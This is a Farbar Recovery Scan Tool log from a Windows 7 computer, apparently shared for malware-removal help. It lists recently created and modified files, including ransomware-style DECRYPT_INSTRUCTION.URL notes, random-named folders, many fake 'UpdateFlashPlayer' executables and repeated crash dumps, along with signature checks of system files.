2014-11-12 10:10 - 2014-11-05 21:47 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-11-12 10:10 - 2014-11-05 21:46 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-11-12 10:10 - 2014-11-05 21:46 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-11-12 10:10 - 2014-11-05 21:44 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-11-12 10:10 - 2014-11-05 21:43 - 02884096 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-12 10:10 - 2014-11-05 21:36 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-12 10:10 - 2014-11-05 21:35 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-11-12 10:10 - 2014-11-05 21:31 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-11-12 10:10 - 2014-11-05 21:30 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-11-12 10:10 - 2014-11-05 21:30 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-11-12 10:10 - 2014-11-05 21:29 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-11-12 10:10 - 2014-11-05 21:28 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-11-12 10:10 - 2014-11-05 21:23 - 06040064 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-12 10:10 - 2014-11-05 21:20 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-11-12 10:10 - 2014-11-05 21:16 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-12 10:10 - 2014-11-05 21:13 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-11-12 10:10 - 2014-11-05 21:13 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-11-12 10:10 - 2014-11-05 21:12 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-11-12 10:10 - 2014-11-05 21:10 - 19781632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-11-12 10:10 - 2014-11-05 21:10 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-11-12 10:10 - 2014-11-05 21:07 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-11-12 10:10 - 2014-11-05 21:05 - 02277376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-11-12 10:10 - 2014-11-05 21:04 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-11-12 10:10 - 2014-11-05 21:03 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-11-12 10:10 - 2014-11-05 21:02 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-11-12 10:10 - 2014-11-05 21:00 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-11-12 10:10 - 2014-11-05 21:00 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-12 10:10 - 2014-11-05 20:59 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-11-12 10:10 - 2014-11-05 20:58 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-11-12 10:10 - 2014-11-05 20:57 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-12 10:10 - 2014-11-05 20:48 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-11-12 10:10 - 2014-11-05 20:42 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-11-12 10:10 - 2014-11-05 20:41 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-12 10:10 - 2014-11-05 20:41 - 00716800 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-11-12 10:10 - 2014-11-05 20:39 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-11-12 10:10 - 2014-11-05 20:38 - 02124288 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-12 10:10 - 2014-11-05 20:37 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-11-12 10:10 - 2014-11-05 20:36 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-11-12 10:10 - 2014-11-05 20:34 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-11-12 10:10 - 2014-11-05 20:30 - 14390272 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-12 10:10 - 2014-11-05 20:22 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-11-12 10:10 - 2014-11-05 20:21 - 04298240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-11-12 10:10 - 2014-11-05 20:21 - 02051072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-11-12 10:10 - 2014-11-05 20:20 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-11-12 10:10 - 2014-11-05 20:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-12 10:10 - 2014-11-05 20:04 - 01550336 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-12 10:10 - 2014-11-05 20:03 - 12819456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-11-12 10:10 - 2014-11-05 19:53 - 00799232 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-11-12 10:10 - 2014-11-05 19:52 - 01892864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-11-12 10:10 - 2014-11-05 19:48 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-11-12 10:10 - 2014-11-05 19:47 - 00708096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-11-12 10:10 - 2014-11-05 11:56 - 00304640 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-11-12 10:10 - 2014-11-05 11:56 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-11-12 10:10 - 2014-11-05 11:52 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-11-12 10:10 - 2014-10-13 20:16 - 00155064 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-11-12 10:10 - 2014-10-13 20:13 - 00683520 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-11-12 10:10 - 2014-10-13 20:12 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-12 10:10 - 2014-10-13 20:09 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 10:10 - 2014-10-13 20:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 10:10 - 2014-10-13 19:50 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-11-12 10:10 - 2014-10-13 19:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-11-12 10:10 - 2014-10-13 19:47 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2014-11-12 10:10 - 2014-10-13 19:46 - 00681984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2014-11-12 10:09 - 2014-10-24 19:57 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 10:09 - 2014-10-24 19:32 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-11-12 10:09 - 2014-10-17 20:05 - 00861696 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 10:09 - 2014-10-17 19:33 - 00571904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2014-11-12 10:09 - 2014-10-13 20:13 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-11-12 10:09 - 2014-10-13 19:50 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-11-12 10:09 - 2014-10-09 18:57 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-12 10:09 - 2014-10-02 20:12 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 10:09 - 2014-10-02 20:11 - 00680960 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 10:09 - 2014-10-02 20:11 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-11-12 10:09 - 2014-10-02 20:11 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-11-12 10:09 - 2014-10-02 20:11 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 10:09 - 2014-10-02 19:44 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-11-12 10:09 - 2014-10-02 19:44 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-11-12 10:09 - 2014-10-02 19:44 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-11-12 10:09 - 2014-09-19 03:42 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-11-12 10:09 - 2014-09-19 03:23 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-11-12 10:09 - 2014-08-21 00:43 - 01882624 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 10:09 - 2014-08-21 00:40 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-11-12 10:09 - 2014-08-21 00:26 - 01237504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-11-12 10:09 - 2014-08-21 00:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2014-11-12 10:09 - 2014-08-11 20:02 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-11-12 10:09 - 2014-08-11 19:36 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2014-11-11 15:26 - 2014-11-20 16:25 - 00000520 _____ () C:\ProgramData\@system.temp
2014-11-11 15:26 - 2014-11-20 16:25 - 00000256 ____H () C:\ProgramData\@system3.att
2014-11-11 15:25 - 2014-11-24 15:06 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\FrameworkUpdate7
2014-11-11 15:25 - 2014-11-11 15:25 - 00000448 ____H () C:\Users\Glynnda\AppData\Roaming\麽鎒駓覜
2014-11-11 12:21 - 2014-11-12 17:20 - 00000272 _____ () C:\Users\Glynnda\DECRYPT_INSTRUCTION.URL
2014-11-11 12:21 - 2014-11-11 12:21 - 00000268 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-11-11 12:20 - 2014-11-12 17:20 - 00000272 _____ () C:\Users\Glynnda\AppData\DECRYPT_INSTRUCTION.URL
2014-11-11 12:20 - 2014-11-11 12:20 - 00000268 _____ () C:\Users\Glynnda\Downloads\DECRYPT_INSTRUCTION.URL
2014-11-11 12:20 - 2014-11-11 12:20 - 00000268 _____ () C:\Users\Glynnda\Documents\DECRYPT_INSTRUCTION.URL
2014-11-11 12:20 - 2014-11-11 12:20 - 00000268 _____ () C:\Users\Glynnda\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-11-11 12:19 - 2014-11-12 17:20 - 00000272 _____ () C:\Users\Glynnda\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-11-11 12:18 - 2014-11-20 16:24 - 00000284 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-11-10 15:56 - 2014-11-24 15:06 - 00000000 ____D () C:\ProgramData\GoktIwohe
2014-11-10 15:55 - 2014-11-24 15:06 - 00000000 ____D () C:\ProgramData\JigwUdop
2014-11-09 21:26 - 2014-11-11 12:19 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\YvvvPack
2014-11-09 21:25 - 2014-11-11 12:19 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\Erftion
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-12-07 19:49 - 2014-10-22 19:38 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfee62e1a80a0.job
2014-12-07 19:44 - 2014-02-07 15:52 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cf244ee1223503.job
2014-12-07 15:15 - 2012-06-10 00:56 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-12-07 15:15 - 2012-06-02 18:02 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-12-07 14:40 - 2012-05-25 18:23 - 00003942 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{A9AB2FB7-477C-476B-9744-F26A55163B37}
2014-12-07 14:40 - 2009-07-13 22:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-07 14:40 - 2009-07-13 22:45 - 00024608 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-07 14:32 - 2009-07-13 22:51 - 00131596 _____ () C:\Windows\setupact.log
2014-12-07 14:31 - 2012-08-19 09:58 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-07 14:31 - 2009-07-13 23:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-02 20:35 - 2012-08-24 21:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\CrashDumps
2014-11-30 11:42 - 2010-11-20 21:47 - 01054980 _____ () C:\Windows\PFRO.log
2014-11-30 10:58 - 2013-03-24 12:28 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\SoftGrid Client
2014-11-30 09:52 - 2014-09-08 14:57 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\LogMeIn Rescue Applet
2014-11-27 22:00 - 2012-05-25 18:31 - 00000000 ____D () C:\ProgramData\support.com
2014-11-26 17:51 - 2012-08-19 09:58 - 00002145 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-11-26 08:00 - 2014-09-03 10:11 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-25 16:52 - 2011-11-16 21:45 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-11-25 16:18 - 2012-05-25 18:17 - 01797405 _____ () C:\Windows\WindowsUpdate.log
2014-11-25 14:51 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35006-01.dmp
2014-11-25 14:32 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-34554-01.dmp
2014-11-25 13:16 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-31325-01.dmp
2014-11-25 12:59 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35412-01.dmp
2014-11-25 12:48 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-33883-01.dmp
2014-11-25 12:30 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-26722-01.dmp
2014-11-25 12:16 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36878-01.dmp
2014-11-25 12:03 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-21200-01.dmp
2014-11-25 12:00 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-31403-01.dmp
2014-11-25 11:47 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-30763-01.dmp
2014-11-25 11:31 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-23493-01.dmp
2014-11-25 11:16 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-34445-01.dmp
2014-11-25 10:57 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-25740-01.dmp
2014-11-25 10:42 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-30310-01.dmp
2014-11-25 10:26 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-32058-01.dmp
2014-11-25 10:15 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36145-01.dmp
2014-11-25 10:01 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-31434-01.dmp
2014-11-25 09:46 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35147-01.dmp
2014-11-25 09:27 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-29780-01.dmp
2014-11-25 09:13 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-47018-01.dmp
2014-11-25 08:56 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-29000-01.dmp
2014-11-25 08:04 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-25006-01.dmp
2014-11-25 07:54 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-30872-02.dmp
2014-11-25 07:39 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-37253-01.dmp
2014-11-25 07:23 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-33228-01.dmp
2014-11-25 07:09 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-33665-01.dmp
2014-11-25 06:54 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-29187-01.dmp
2014-11-25 06:31 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35505-01.dmp
2014-11-25 06:07 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36972-01.dmp
2014-11-25 05:51 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35583-01.dmp
2014-11-25 05:37 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35895-01.dmp
2014-11-25 05:19 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-30825-01.dmp
2014-11-25 05:03 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36582-01.dmp
2014-11-25 04:43 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-25818-01.dmp
2014-11-25 04:28 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35303-01.dmp
2014-11-25 04:10 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-23337-01.dmp
2014-11-25 03:56 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-34382-01.dmp
2014-11-25 03:42 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-38875-01.dmp
2014-11-25 03:21 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-38313-01.dmp
2014-11-25 03:16 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-47205-01.dmp
2014-11-25 02:57 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36348-01.dmp
2014-11-25 02:43 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-35427-01.dmp
2014-11-25 02:31 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-25958-01.dmp
2014-11-25 02:15 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-18096-01.dmp
2014-11-25 02:12 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-29764-01.dmp
2014-11-25 01:52 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-32635-01.dmp
2014-11-25 01:44 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-36192-01.dmp
2014-11-25 01:30 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-45115-01.dmp
2014-11-25 01:11 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-55739-01.dmp
2014-11-25 01:03 - 2011-11-17 00:27 - 00336564 _____ () C:\Windows\Minidump\112514-47798-01.dmp
2014-11-25 00:37 - 2012-05-25 18:59 - 00000000 ____D () C:\McAfeePromo
2014-11-24 15:10 - 2012-05-25 18:59 - 00000000 ____D () C:\ProgramData\McAfee
2014-11-24 15:06 - 2014-09-05 08:34 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Umci
2014-11-24 15:06 - 2013-10-10 14:20 - 00000000 __SHD () C:\Users\Glynnda\AppData\Roaming\bhurraus
2014-11-24 11:31 - 2012-05-28 15:43 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\Microsoft Games
2014-11-24 11:29 - 2012-05-25 18:19 - 00000000 ____D () C:\Users\Glynnda
2014-11-24 11:26 - 2012-05-25 18:20 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\VirtualStore
2014-11-20 12:08 - 2009-07-13 23:13 - 00006506 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-15 18:07 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\rescache
2014-11-14 09:53 - 2009-07-13 23:08 - 00032608 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-11-13 10:44 - 2014-10-22 19:38 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1cfee62e1a80a0
2014-11-13 10:44 - 2012-08-19 09:58 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-11-12 16:13 - 2012-08-19 09:58 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\Google
2014-11-12 11:38 - 2009-07-13 22:45 - 00267672 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-11-12 11:37 - 2014-05-05 20:29 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-11-12 11:24 - 2013-08-14 08:20 - 00000000 ____D () C:\Windows\system32\MRT
2014-11-12 11:20 - 2012-11-07 09:58 - 103374192 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-11-11 13:08 - 2009-07-13 21:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-11-11 12:21 - 2013-06-03 10:47 - 00000000 ____D () C:\Users\Public\Data
2014-11-11 12:20 - 2014-04-28 13:02 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\ShopAtHome
2014-11-11 12:20 - 2012-05-29 15:01 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\QuickScan
2014-11-11 12:20 - 2012-05-25 19:07 - 00000000 ____D () C:\Users\Glynnda\Documents\STK
2014-11-11 12:20 - 2012-05-25 18:24 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Adobe
2014-11-11 12:18 - 2011-11-16 22:07 - 00000000 ____D () C:\ProgramData\TouchSmartData
2014-11-11 12:18 - 2011-11-16 21:52 - 00000000 ____D () C:\ProgramData\Sonic
2014-11-11 12:18 - 2011-11-16 21:42 - 00000000 ____D () C:\ProgramData\Hewlett-Packard
2014-11-11 12:16 - 2013-05-17 11:00 - 00000000 ____D () C:\ProgramData\Etiam
Some content of TEMP:
====================
C:\Users\Glynnda\AppData\Local\Temp\amd-catalyst-14-9-win7-win8.1-64bit-dd-ccc-whql.exe
C:\Users\Glynnda\AppData\Local\Temp\min_Support.com_SOP_Toolkit.exe
C:\Users\Glynnda\AppData\Local\Temp\OfficeDepot_SolutionsToolkit.exe
C:\Users\Glynnda\AppData\Local\Temp\procexp64.exe
C:\Users\Glynnda\AppData\Local\Temp\SE7D65.tmp.dll
C:\Users\Glynnda\AppData\Local\Temp\SEA1A9.tmp.dll
C:\Users\Glynnda\AppData\Local\Temp\temp364895725.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_07a17db1.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_19bb43db.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_368dac06.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_38d0d8b0.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_6d7b2921.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_6fa3d6dc.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_70c11fca.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_77a89ba9.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_80816c5b.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_8ce12509.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_8e19d694.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_998d164f.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_b3f30894.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_b5966f14.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_c70a591b.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_d23fc077.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_e5723010.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_ed038b48.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_f39a9589.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_f9162bc0.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_fb3f19b3.exe
C:\Users\Glynnda\AppData\Local\Temp\UpdateFlashPlayer_fcd79a95.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-11-15 18:01
==================== End Of Log ============================
Addition one:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 07-12-2014 02
Ran by Glynnda at 2014-12-07 20:36:35
Running from C:\Users\Glynnda\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}
